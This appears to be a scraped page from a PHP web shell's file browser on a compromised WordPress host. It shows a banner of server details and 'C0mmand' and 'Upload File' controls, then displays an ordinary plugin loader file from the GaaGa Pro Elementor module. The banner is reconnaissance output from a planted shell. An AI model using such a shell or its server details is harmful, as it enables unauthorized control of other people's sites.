|
Server IP : 10.106.20.8 / Your IP : 216.73.216.148 Web Server : Apache System : Linux webm008.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 User : sixiemesrc ( 611999) PHP Version : 8.0.30 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/sixiemesrc/new/wp-content/plugins/gaaga-pro/../gaaga-pro/modules/post/elementor/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
if( !class_exists( 'GaaGaProBlogPostElementor' ) ) {
class GaaGaProBlogPostElementor {
private static $_instance = null;
const MINIMUM_ELEMENTOR_VERSION = '3.0.0';
const MINIMUM_PHP_VERSION = '7.2';
public static function instance() {
if ( is_null( self::$_instance ) ) {
self::$_instance = new self();
}
return self::$_instance;
}
function __construct() {
add_action( 'plugins_loaded', array( $this, 'register_init' ) );
}
function register_init() {
$this->load_modules();
}
function load_modules() {
foreach( glob( GAAGA_PRO_DIR_PATH. 'modules/post/elementor/widgets/*/index.php' ) as $module ) {
include_once $module;
}
}
}
}
GaaGaProBlogPostElementor::instance();